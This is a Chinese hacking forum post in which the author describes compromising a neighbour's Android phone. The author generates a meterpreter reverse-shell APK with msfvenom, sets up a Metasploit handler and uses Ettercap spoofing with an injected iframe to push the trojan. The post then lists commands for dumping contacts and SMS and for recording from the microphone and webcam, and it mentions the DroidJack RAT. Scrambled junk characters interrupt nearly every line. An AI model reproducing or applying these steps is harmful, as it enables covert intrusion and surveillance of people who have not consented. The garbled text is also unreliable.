找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1821|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

@0 M$ q9 P3 i1 K* ~3 ~' ^ 五、msf+ettercap入侵邻居安卓手机 6 P+ x. M* {+ v" S' f8 A: Y) j

7 E. d0 L# k z* d# Y4 |: E0 [

' G% g; a1 [" v$ S. F! v) s/ M 首先启动msf ( G5 @; g: [& U6 Y0 n7 ?& n

8 g7 F6 ` J9 j' n9 h5 n; W

! H$ G# P: b" e# x, U- ~% }0 ~6 V( h 先用kali生成一个安卓木马,如下命令: / i# |* m" z1 R, R$ f7 j

! Z- [: g- a4 l; _: U8 n2 f; L3 R

& j/ H: ?- ^ R4 C( b( S& D9 p# K6 i) } Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk # i p" L- Q/ {. R

) ?! A/ o' H/ B& _, c

- j. s, Q* W# G; e 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 & v6 s0 n i% l0 f4 z P& |

. [: ?+ K" C/ h4 k3 w1 }

6 I1 R+ b" e/ Z. } 然后进入msf 7 u' i0 a2 G5 X0 h2 H: u6 B5 l- c

. n# ] a! I# c5 E! d' X

% L2 u- w, P4 i; e& j use exploit/multi/handler ) e: u% i8 T6 ]- b, S4 Z7 P, J

/ X2 }0 X3 `3 J$ A( g) }+ G

' N( ]% C( H" [7 K' N# { set payload android/meterpreter/reverse_tcp + E0 W2 _2 q2 E" U6 ?& `$ @: [" B

$ E9 Y5 V! V, u. v" v7 V3 R! o# {+ j

@2 Q) ?% D0 k set LHOST 192.168.0.109 //ipkailiip - b& \& s1 @. R4 R0 b4 E( k1 c. P

; x4 `6 R5 Q- A3 i4 d

8 }1 V$ G/ X' @9 K set LPORT 44444 //端口一定要与前面生成的木马的端口一致 8 U6 A V* j8 U' y5 t

" i, V% U% O, i( q/ I9 [9 D0 j& `7 i

( v) m* Y& J1 e Exploit 2 K6 d& y1 q( D( W/ M7 X; `

* t3 T2 N7 l& d7 H

, S4 k5 R9 W0 I7 ^( i   9 Y: {! X2 x6 p0 O

( m+ c4 z. C5 _1 Z

$ P( |0 ?2 Y% ~( [7 l 下面我们开启ettercap -G 2 i4 I1 L( E& c/ k" c

9 G. R' T3 c) b. _, v; Z

( t% Q, ]+ H0 _0 R 我物理IP , _, R" L. C9 C9 j. e

7 a) o4 d7 {( ~

' }* @/ X: w' H: `$ G1 ?# Z9 ?1 Y: m   1 @% X2 o% H$ i& N. [

0 v0 N# F8 T7 V2 }1 t

9 H% ?! q8 d3 a3 z1 C! g. _8 l 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 8 D( G6 R& c8 j+ t7 K- d0 E

, V( K! }9 e+ k5 m8 S

# \" K( h! u$ f( b9 V, [ 下面我们来设置一下 & m5 X& N# W7 g% L P# y* |% X$ i. h4 Z

: R0 Q2 ]+ j1 c7 `8 W3 F+ E1 g7 \

# H% z, E' a# _* n9 J' d- C   & k7 ?& }$ Q. E0 }$ k; `

) D/ H6 y. M+ R+ |; N: O8 h

) l' Q2 b' q: N9 v- ~# w 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ; L9 N0 U( Q6 j3 K

}/ P( [- D/ y5 a' q' T

P1 F3 E* i' X- }. i K% l$ ^; H   $ o8 @0 J, {8 K, q

- J1 m G! |1 b. D; l N

; d- i4 M9 C# N% W; ?1 p8 m4 J) n   ( @* O U. [8 F! i

; \, Z$ x' Y& P+ i, s7 C

+ K& N* q2 t9 F2 R f# f8 P8 {7 v   " F. z" x6 w) B

$ V6 b' H0 o. ^( O2 o+ _7 B+ H

- q6 ]$ I7 i2 `/ o( x! w   }+ f a) X+ [

! h/ a6 q: b# P

! N2 P/ U) Q% _) K! E* E7 o   8 {: e1 q' S* `! t* N3 ?

; [' K# W+ Q) X! Z. C

% _' H6 }5 P; g1 l. p2 r   / w9 ]4 S" r8 j4 w

. {( q2 d* W9 m( p5 U6 E

4 B9 b% z/ Z7 F; g   ) J% ]2 ^% R8 ]( I6 d

. q" ^6 S/ n8 {5 j

' Q6 h. q/ n; c7 S* f5 Q! z- K   4 z8 v, J& `" l9 L

r9 K% z5 D1 n! B

% b! o0 J4 m+ K( n2 Z3 A   $ T5 @8 u3 z0 L9 v" [

2 K! L2 g# x- q' K, |8 Y2 {

" m/ m+ o. S( o   ' U* |* t1 t* `* U0 P

7 c5 w! x8 I6 O

0 F7 w; ]3 K" G& o   6 u' U8 Q: w8 M% a% T6 n9 x- x- A

- e7 V8 \" R3 ]9 t

+ Z* u- ^, \7 N' _ s% K1 v# p$ ~   ) t0 i8 q, o" o& @4 @

8 y6 }, a' N7 A0 _

/ r* _: f6 E$ B( @) d1 [   # _, i- t, W7 y

; ?- l; m0 A" o E

3 `9 G( m9 V; |. M/ v 下面我们开始攻击 " b# H0 N. _% B! M

1 ?$ y" _# Y ?( F9 C

i+ j. g% m$ z8 a% R   \. N2 `. l9 d& t9 N' ~2 J( F' h

9 x3 t$ J% v" v n

7 A5 e( O8 j. m, T& }! V0 H; b   e1 s1 Z A' {! w! @9 {

1 ]- `+ P" x: @7 G5 V

4 o8 Q# x; _9 g( u   0 [% S3 r4 B3 O7 }7 _/ f" L

" t4 k i, ?/ P6 H3 Q4 M2 [

7 y, X' Z/ K3 u3 \/ F: C) m( R; {   ! G4 P- q+ ?* k2 [

7 }% k. { P" L" t6 ^

) P- Z0 o: P) O+ c3 B   , m/ p& A3 y9 |( a8 y

) p- b+ b2 X+ [: S$ ?

4 `6 M# i) \ @ 大概过了5分钟多,发现反弹成功了 % N* f; U; E/ x+ K2 }2 r0 i

) N; R1 i8 `6 ^8 {" V" R! O

2 W7 o# U! O& l/ b1 a   ' }- T# z2 O$ y

) k# Q+ x, X- s! W$ T# s5 C+ ^9 G$ h

' f6 z" `# ~$ [% P; j   0 B+ F. o/ I% W( ^2 i6 a/ _

6 Q# g% v% Y( N' o B* {; p; b

* x( p) p1 {% Z/ H5 V   c& O5 {- X5 P2 e

5 q3 y) ~9 { r+ q% l: A0 f1 e

; N9 z2 q- n5 s# ]3 M   $ o6 M! G3 S* D3 I0 B

% Z% @# U; c: W( r# q8 |

) G. N$ S' h, c# a2 O* }/ ~   % ~) u, S z$ G

8 d. |9 G1 m! K2 n/ L' T

* C8 u0 p9 J9 g& ? v6 w   ( o0 D' a; b# _" q8 t9 z# |

& z U" m1 P" b

( b: ? h) X8 r, |/ F   ! ^; l8 o$ {# j ~

9 ~4 } J7 g N3 |7 T J

4 n' K: N5 [4 W) E7 B3 o9 o4 c 执行命令 - b$ D }+ n4 c4 N/ L0 m, J

! Y1 r9 W4 ~: o9 E+ |

) t( ^+ g" P4 ~4 l- c" A   - v2 @( i f0 D, u; Y/ i

7 x+ U; _) h R Z3 N; k3 q) }4 S

- Y" P0 T' r* l& Y/ F8 c dump_contacts    --》这个是导出电话 ' H. b8 ^0 c: o9 w- G' n

5 q z7 y& w4 s2 u4 W3 y# C. C I& `, i

4 {- [( c, I( J0 Y1 J dump_sms --》这个是导出信息 . Z5 _% S; L" f* W: `

. W Y# d5 u) u+ z0 W1 ]+ V

) g' @% B; x9 Z' ? record_mic     Record audio from the default microphone for X seconds - B3 U& V5 \$ p! L( J7 Q

1 j4 c! P' g3 g* M9 ?3 ~

6 N8 |/ l5 ^( Q     webcam_chat    Start a video chat t z T; ~/ u$ t; b: Q

/ h2 y# b) t3 A$ t

( ]! X" G: N0 }& f8 [     webcam_list    List webcams ; |# q+ ]* [+ H0 y0 P) x7 L

, h" J0 F2 T) u

* M1 ?0 \. f4 l     webcam_snap    Take a snapshot from the specified webcam q+ m" C$ D0 c

: F, A" | | G

5 Q5 ?7 I0 @& r9 O webcam_stream  lay a video stream from the specified webcam & \# n+ \! L6 {# Z' h

6 ~/ K7 N; P! E, ?7 J5 r5 x5 D

( ~& n3 ?: @* {& M   9 j9 d: H) e: I$ y/ S2 p: p

1 y& n L: P, @' d

7 r; c8 F: O+ E   , b! U$ I p- Q0 O- `

: V f2 U" {6 E% Z/ ^4 s$ J

. x/ \* @% q! }: t 我们打开看一下电话薄, $ I4 p& N( q, V7 b

) i9 \1 ?- q. o

- ?+ U, O! j; b. D* u1 y   6 i3 U+ Q4 g& {0 y- ?7 x; M' V0 F

" I6 c/ Z! E7 d

M( Q; Y% Z t8 w# A) p4 K& F   & j8 ]0 ^* {: O+ [2 {7 I

% q& o' c* k) ?- e" q

3 w4 t5 V6 z! f. \   2 X6 ^0 h4 k! { {* @

0 r$ }$ d" r) O# @

j, W F# M9 D y   3 I0 j, z) h& d$ w) g

o3 g! ]+ V6 p2 H

3 m5 c0 V% u( V# b2 E/ B% s1 f- O   & c6 s8 ~& b7 W

* s# F( K8 _6 r3 c6 q% s" C

9 X# h2 P, L- U. ?- H$ ?   ' j6 v% M4 f }

+ Y: _3 S! Q( G. M7 t

' I+ _8 h6 j' b& [ l$ ` 我们同时欺骗成DroidJack木马,使用方法如图: 7 @* M2 w7 p) v. ]+ } G1 V# s

% E! k ?5 u( K! M7 f, R7 W- O

# U1 z) j2 F7 b1 F2 ^/ T' x   7 W/ C: h S% \& C( @+ D, n

; G( k C& |3 x" J% j) ]% d# s

0 X4 Z4 P, K8 i! q5 k. V   : p& o: l0 z5 I |

# L6 G6 o4 Z- y, m) Q

- k2 q" Y# ^' l$ ~7 V0 G' R   0 [2 O9 Z; o- b! v

' t8 ^$ N2 c2 z- F

6 i, w5 Q0 H: a" B5 B) Q, a 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 e3 P* N4 [8 D' u4 K$ }5 K

8 b& [+ K$ q% P2 O, d4 \

5 B5 ^ o3 t5 E$ o6 I8 N9 F8 O   5 X$ Z/ ~8 U: d5 F+ ^* U6 M x

3 a* q3 r1 V! w: r) s

- F; X: k6 O3 A/ l8 P* Z   & z" f- Z8 k) H5 U: i, @

% l+ n8 d) u d! r1 \

- T) {3 b9 x1 {+ E8 C   5 I2 H) i$ w) a; Z$ g

/ z- U) [4 B- G- a* ?( {7 O% t6 ^

4 }& {/ Q& `# m9 D 3 u. z/ y* }3 M- s

$ S- I! t5 m n

* Z2 R# d S; B0 N5 T5 f/ y9 f5 f) T
. {' U9 x& M7 Q7 Y) N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表